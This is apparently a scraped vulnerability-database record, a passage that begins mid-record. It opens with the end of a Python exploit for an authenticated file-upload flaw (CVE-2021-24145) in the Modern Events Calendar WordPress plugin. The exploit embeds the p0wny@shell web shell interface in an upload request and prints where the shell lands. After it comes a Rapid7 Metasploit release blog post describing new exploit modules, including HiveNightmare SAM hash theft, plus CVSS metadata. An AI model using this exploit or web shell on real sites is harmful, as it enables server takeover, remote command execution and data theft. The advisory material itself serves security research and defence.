commandHistory = [];\\n var historyPosition = 0;\\n var eShellCmdInput = null;\\n var eShellContent = null;\\n\\n function _insertCommand(command) {\\n eShellContent.innerHTML += \\\"\\\\n\\\\n\\\";\\n eShellContent.innerHTML += '<span class=\\\\\\\"shell-prompt\\\\\\\">' + genPrompt(CWD) + '</span> ';\\n eShellContent.innerHTML += escapeHtml(command);\\n eShellContent.innerHTML += \\\"\\\\n\\\";\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _insertStdout(stdout) {\\n eShellContent.innerHTML += escapeHtml(stdout);\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _defer(callback) {\\n setTimeout(callback, 0);\\n }\\n\\n function featureShell(command) {\\n\\n _insertCommand(command);\\n if (/^\\\\s*upload\\\\s+[^\\\\s]+\\\\s*$/.test(command)) {\\n featureUpload(command.match(/^\\\\s*upload\\\\s+([^\\\\s]+)\\\\s*$/)[1]);\\n } else if (/^\\\\s*clear\\\\s*$/.test(command)) {\\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\\n eShellContent.innerHTML = '';\\n } else {\\n makeRequest(\\\"?feature=shell\\\", {cmd: command, cwd: CWD}, function (response) {\\n if (response.hasOwnProperty('file')) {\\n featureDownload(response.name, response.file)\\n } else {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n }\\n });\\n }\\n }\\n\\n function featureHint() {\\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\\n\\n function _requestCallback(data) {\\n if (data.files.length <= 1) return; // no completion\\n\\n if (data.files.length === 2) {\\n if (type === 'cmd') {\\n eShellCmdInput.value = data.files[0];\\n } else {\\n var currentValue = eShellCmdInput.value;\\n eShellCmdInput.value = currentValue.replace(/([^\\\\s]*)$/, data.files[0]);\\n }\\n } else {\\n _insertCommand(eShellCmdInput.value);\\n _insertStdout(data.files.join(\\\"\\\\n\\\"));\\n }\\n }\\n\\n var currentCmd = eShellCmdInput.value.split(\\\" \\\");\\n var type = (currentCmd.length === 1) ? \\\"cmd\\\" : \\\"file\\\";\\n var fileName = (type === \\\"cmd\\\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\\n\\n makeRequest(\\n \\\"?feature=hint\\\",\\n {\\n filename: fileName,\\n cwd: CWD,\\n type: type\\n },\\n _requestCallback\\n );\\n\\n }\\n\\n function featureDownload(name, file) {\\n var element = document.createElement('a');\\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\\n element.setAttribute('download', name);\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.click();\\n document.body.removeChild(element);\\n _insertStdout('Done.');\\n }\\n\\n function featureUpload(path) {\\n var element = document.createElement('input');\\n element.setAttribute('type', 'file');\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.addEventListener('change', function () {\\n var promise = getBase64(element.files[0]);\\n promise.then(function (file) {\\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n });\\n }, function () {\\n _insertStdout('An unknown client-side error occurred.');\\n });\\n });\\n element.click();\\n document.body.removeChild(element);\\n }\\n\\n function getBase64(file, onLoadCallback) {\\n return new Promise(function(resolve, reject) {\\n var reader = new FileReader();\\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\\n reader.onerror = reject;\\n reader.readAsDataURL(file);\\n });\\n }\\n\\n function genPrompt(cwd) {\\n cwd = cwd || \\\"~\\\";\\n var shortCwd = cwd;\\n if (cwd.split(\\\"/\\\").length > 3) {\\n var splittedCwd = cwd.split(\\\"/\\\");\\n shortCwd = \\\"\\xe2\\x80\\xa6/\\\" + splittedCwd[splittedCwd.length-2] + \\\"/\\\" + splittedCwd[splittedCwd.length-1];\\n }\\n return \\\"p0wny@shell:<span title=\\\\\\\"\\\" + cwd + \\\"\\\\\\\">\\\" + shortCwd + \\\"</span>#\\\";\\n }\\n\\n function updateCwd(cwd) {\\n if (cwd) {\\n CWD = cwd;\\n _updatePrompt();\\n return;\\n }\\n makeRequest(\\\"?feature=pwd\\\", {}, function(response) {\\n CWD = response.cwd;\\n _updatePrompt();\\n });\\n\\n }\\n\\n function escapeHtml(string) {\\n return string\\n .replace(/&/g, \\\"&\\\")\\n .replace(/</g, \\\"<\\\")\\n .replace(/>/g, \\\">\\\");\\n }\\n\\n function _updatePrompt() {\\n var eShellPrompt = document.getElementById(\\\"shell-prompt\\\");\\n eShellPrompt.innerHTML = genPrompt(CWD);\\n }\\n\\n function _onShellCmdKeyDown(event) {\\n switch (event.key) {\\n case \\\"Enter\\\":\\n featureShell(eShellCmdInput.value);\\n insertToHistory(eShellCmdInput.value);\\n eShellCmdInput.value = \\\"\\\";\\n break;\\n case \\\"ArrowUp\\\":\\n if (historyPosition > 0) {\\n historyPosition--;\\n eShellCmdInput.blur();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n _defer(function() {\\n eShellCmdInput.focus();\\n });\\n }\\n break;\\n case \\\"ArrowDown\\\":\\n if (historyPosition >= commandHistory.length) {\\n break;\\n }\\n historyPosition++;\\n if (historyPosition === commandHistory.length) {\\n eShellCmdInput.value = \\\"\\\";\\n } else {\\n eShellCmdInput.blur();\\n eShellCmdInput.focus();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n }\\n break;\\n case 'Tab':\\n event.preventDefault();\\n featureHint();\\n break;\\n }\\n }\\n\\n function insertToHistory(cmd) {\\n commandHistory.push(cmd);\\n historyPosition = commandHistory.length;\\n }\\n\\n function makeRequest(url, params, callback) {\\n function getQueryString() {\\n var a = [];\\n for (var key in params) {\\n if (params.hasOwnProperty(key)) {\\n a.push(encodeURIComponent(key) + \\\"=\\\" + encodeURIComponent(params[key]));\\n }\\n }\\n return a.join(\\\"&\\\");\\n }\\n var xhr = new XMLHttpRequest();\\n xhr.open(\\\"POST\\\", url, true);\\n xhr.setRequestHeader(\\\"Content-Type\\\", \\\"application/x-www-form-urlencoded\\\");\\n xhr.onreadystatechange = function() {\\n if (xhr.readyState === 4 && xhr.status === 200) {\\n try {\\n var responseJson = JSON.parse(xhr.responseText);\\n callback(responseJson);\\n } catch (error) {\\n alert(\\\"Error while parsing response: \\\" + error);\\n }\\n }\\n };\\n xhr.send(getQueryString());\\n }\\n\\n document.onclick = function(event) {\\n event = event || window.event;\\n var selection = window.getSelection();\\n var target = event.target || event.srcElement;\\n\\n if (target.tagName === \\\"SELECT\\\") {\\n return;\\n }\\n\\n if (!selection.toString()) {\\n eShellCmdInput.focus();\\n }\\n };\\n\\n window.onload = function() {\\n eShellCmdInput = document.getElementById(\\\"shell-cmd\\\");\\n eShellContent = document.getElementById(\\\"shell-content\\\");\\n updateCwd();\\n eShellCmdInput.focus();\\n };\\n </script>\\n </head>\\n\\n <body>\\n <div id=\\\"shell\\\">\\n <pre id=\\\"shell-content\\\">\\n <div id=\\\"shell-logo\\\">\\n ___ ____ _ _ _ _ _ <span></span>\\n _ __ / _ \\\\__ ___ __ _ _ / __ \\\\ ___| |__ ___| | |_ /\\\\/|| || |_ <span></span>\\n| '_ \\\\| | | \\\\ \\\\ /\\\\ / / '_ \\\\| | | |/ / _` / __| '_ \\\\ / _ \\\\ | (_)/\\\\/_ .. _|<span></span>\\n| |_) | |_| |\\\\ V V /| | | | |_| | | (_| \\\\__ \\\\ | | | __/ | |_ |_ _|<span></span>\\n| .__/ \\\\___/ \\\\_/\\\\_/ |_| |_|\\\\__, |\\\\ \\\\__,_|___/_| |_|\\\\___|_|_(_) |_||_| <span></span>\\n|_| |___/ \\\\____/ <span></span>\\n </div>\\n </pre>\\n <div id=\\\"shell-input\\\">\\n <label for=\\\"shell-cmd\\\" id=\\\"shell-prompt\\\" class=\\\"shell-prompt\\\">???</label>\\n <div>\\n <input id=\\\"shell-cmd\\\" name=\\\"cmd\\\" onkeydown=\\\"_onShellCmdKeyDown(event)\\\"/>\\n </div>\\n </div>\\n </div>\\n </body>\\n\\n</html>\\n\\r\\n-----------------------------29650037893637916779865254589\\r\\nContent-Disposition: form-data; name=\\\"mec-ix-action\\\"\\r\\n\\r\\nimport-start-bookings\\r\\n-----------------------------29650037893637916779865254589--\\r\\n\"\r\n\r\n# Exploit\r\nsession.post(exploit_url, headers=header, data=body)\r\nprint('')\r\nprint('[+] Shell Uploaded to: ' + 'http://' + target_ip + ':' + target_port + wp_path + '/wp-content/uploads/shell.php')\r\nprint('')", "sourceHref": "https://www.exploit-db.com/download/50082", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-07-30T19:00:15", "description": "## New Olympic Discipline: Hive Hunting\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/07/metasploit-blg-2-small.png)\n\nThis week, community contributor [Hakyac](<https://github.com/Hakyac>) added a new Olympic discipline to Metasploit exploit sport category, which is based on the work of community security researchers [@jonasLyk](<https://twitter.com/jonasLyk/status/1417205166172950531>) and [Kevin Beaumont](<https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5>)). The rules are simple: You need to abuse a flaw in Windows 10 and 11 configuration to pass through the defense and access Security Account Manager (SAM) files. Any local unprivileged player is able to read this sensitive security information, such as hashes of user/admin passwords. The best strategy to win a gold medal is to start abusing Windows Volume Shadow Copy Service (VSS) to access these files and copy them locally. Finally, you just need to dump the NTLM hashes, use them in a pass-the-hash attack and score with a remote code execution.\n\nNote that Microsoft issued an out-of-band [advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>) and tracked this vulnerability as [CVE-2021-36934](<https://attackerkb.com/topics/DOrZUykRSX/cve-2021-36934-windows-elevation-of-privilege?referrer=blog>). You can find more information about the rules in this blog [post](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>). Happy Hive hunting!\n\n## Gold Medal for NetGear R7000 in Swimming 100m Heap Overflow\n\nOur own [Grant Willcox](<https://github.com/gwillcox-r7>) added a new exploit module that won the Swimming 100m Heap Overflow discipline. It took advantage of a flaw in `genie.cgi?backup.cgi` page of Netgear R7000 routers to enable a telnet server and easily got code execution as the `root` user. Note that, whereas firmware versions `1.0.11.116` and prior are vulnerable, this module can only be used with versions `1.0.11.116` at the moment. The `check` method can still be used to detect if older devices are vulnerable. This module is based on research done by [@colorlight2019](<https://twitter.com/colorlight2019>). A new gold medal for the Metasploit team, great job!\n\n## New module content (5)\n\n * [Netgear R7000 backup.cgi Heap Overflow RCE](<https://github.com/rapid7/metasploit-framework/pull/15163>) by [Grant Willcox](<https://github.com/gwillcox-r7>), SSD Disclosure, and colorlight2019, which exploits [CVE-2021-31802](<https://attackerkb.com/topics/KwzVhOiykj/cve-2021-31802?referrer=blog>) \\- This adds an module that will leverage CVE-2021-31802 which is an unauthenticated RCE in Netgear R7000 routers. The vulnerability is leveraged to execute a shellcode stub that will enable telnet which can then be accessed for root privileges on the affected device.\n * [Pi-Hole Remove Commands Linux Priv Esc](<https://github.com/rapid7/metasploit-framework/pull/15279>) by [Emanuele Barbeno](<https://ch.linkedin.com/in/emanuele-barbeno-b53a4990>) and [h00die](<https://github.com/h00die>), which exploits [CVE-2021-29449](<https://attackerkb.com/topics/0HUT2niFGw/cve-2021-29449?referrer=blog>) \\- This adds a local privilege escalation module that targets Pi-Hole versions >= `3.0` and <= `5.2.4`. In vulnerable versions of the software, a user with `sudo` privileges can escalate to `root` by passing shell commands to either the `removecustomcname`, `removecustomdns`, or `removestaticdhcp` function. The functions have minimal sanitization, and they pass the input to the `sed` command. By default, the `www-data` user is permitted to run `sudo` without supplying a password as configured in the `sudoers.d/pihole` file.\n * [Wordpress Plugin Modern Events Calendar - Authenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/15418>) by Nguyen Van Khanh, [Ron Jost](<https://github.com/Hacker5preme>), and [Yann Castel](<https://github.com/Hakyac>), which exploits [CVE-2021-24145](<https://attackerkb.com/topics/TWCON6tk7O/cve-2021-24145?referrer=blog>) \\- This adds a module that exploits an authenticated file upload vulnerability in the Wordpress plugin known as Modern Events Calendar. For versions before `5.16.5`, an administrative user can upload a php payload via the calendar import feature by setting the content type of the file to `text/csv`. Code execution with the privileges of the user running the server is achieved by sending a request for the uploaded file.\n * [Wordpress Plugin SP Project and Document - Authenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/15408>) by [Ron Jost](<https://github.com/Hacker5preme>) and [Yann Castel](<https://github.com/Hakyac>), which exploits [CVE-2021-24347](<https://attackerkb.com/topics/gechd9yh12/cve-2021-24347?referrer=blog>) \\- This adds a module that exploits an authenticated file upload vulnerability in the Wordpress plugin, SP Project and Document Manager. For versions below `4.22`, an authenticated user can upload arbitrary PHP code because the security check only blocks the upload of files with a `.php` extension, meaning that uploading a file with a `.pHp` extension is allowed. Once uploaded, requesting the file will result in code execution as the `www-data` user.\n * [Windows SAM secrets leak - HiveNightmare](<https://github.com/rapid7/metasploit-framework/pull/15462>) by [Kevin Beaumont](<https://twitter.com/GossiTheDog>), [Yann Castel](<https://github.com/Hakyac>), and [romarroca](<https://github.com/romarroca>), which exploits [CVE-2021-36934](<https://attackerkb.com/topics/DOrZUykRSX/cve-2021-36934-windows-elevation-of-privilege?referrer=blog>) \\- This adds a new exploit module that exploits a configuration issue in Windows 10 (from version 1809) and 11, identified as CVE-2021-36934. Due to permission issues, any local user is able to read SAM and SYSTEM hives. This module abuses Windows Volume Shadow Copy Service (VSS) to access these files and save them locally.\n\n## Enhancements and features\n\n * [#15444](<https://github.com/rapid7/metasploit-framework/pull/15444>) from [pingport80](<https://github.com/pingport80>) \\- This adds additional support for Powershell sessions to some methods in the File mixin leveraged by post modules.\n * [#15465](<https://github.com/rapid7/metasploit-framework/pull/15465>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- Updates the local exploit suggester to gracefully handle modules raising unintended exceptions and nil target information\n\n## Bugs fixed\n\n * [#15359](<https://github.com/rapid7/metasploit-framework/pull/15359>) from [stephenbradshaw](<https://github.com/stephenbradshaw>) \\- Fixes a bug in the ssh_login_pubkey which would crash out when not connected to the db\n * [#15460](<https://github.com/rapid7/metasploit-framework/pull/15460>) from [pingport80](<https://github.com/pingport80>) \\- This fixes a localization-related issue in the File libraries `copy_file` method caused by it searching for a word in the output to determine success.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.54...6.0.55](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-07-22T11%3A58%3A03-05%3A00..2021-07-29T12%3A01%3A27-05%3A00%22>)\n * [Full diff 6.0.54...6.0.55](<https://github.com/rapid7/metasploit-framework/compare/6.0.54...6.0.55>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-30T18:04:33", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.3, "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24145", "CVE-2021-24347", "CVE-2021-29449", "CVE-2021-31802", "CVE-2021-36934"], "modified": "2021-07-30T18:04:33", "id": "RAPID7BLOG:BC95AC0129EFB4BE8FD9B532251948ED", "href": "https://blog.rapid7.com/2021/07/30/metasploit-wrap-up-123/", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}]}

Exploit for Unrestricted Upload of File with Dangerous Type in Webnus Modern Events Calendar Lite

Description

Related